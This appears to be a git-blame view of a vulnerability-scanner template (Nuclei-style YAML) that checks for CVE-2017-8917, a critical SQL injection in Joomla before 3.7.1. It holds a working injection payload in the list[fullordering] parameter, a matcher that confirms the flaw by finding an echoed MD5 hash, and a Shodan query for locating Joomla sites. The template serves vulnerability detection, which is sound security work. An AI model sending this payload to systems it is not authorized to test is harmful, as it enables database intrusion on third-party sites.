2021-04-07 16:39:33 +00:00
id : CVE-2017-8917
2022-04-22 10:38:41 +00:00
2021-04-07 16:39:33 +00:00
info :
2022-09-29 13:38:41 +00:00
name : Joomla! <3.7.1 - SQL Injection
2021-04-07 16:39:33 +00:00
author : princechaddha
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-12 14:04:18 +00:00
description : |
2022-09-29 13:38:41 +00:00
Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
2022-09-21 10:52:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
2022-09-29 13:52:24 +00:00
- http://www.securitytracker.com/id/1038522
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-8917
cwe-id : CWE-89
2022-09-21 10:52:47 +00:00
metadata :
shodan-query : http.component:"Joomla"
2022-09-22 10:47:45 +00:00
verified : "true"
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,joomla,sqli
2021-04-07 16:39:33 +00:00
2022-06-30 03:33:07 +00:00
variables :
num : "999999999"
2021-04-07 16:39:33 +00:00
requests :
- method : GET
path :
2022-06-30 03:33:07 +00:00
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
2021-04-07 16:39:33 +00:00
matchers :
- type : word
2022-05-12 14:04:18 +00:00
part : body
2021-04-07 16:39:33 +00:00
words :
2022-09-21 10:52:47 +00:00
- '{{md5(num)}}'
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28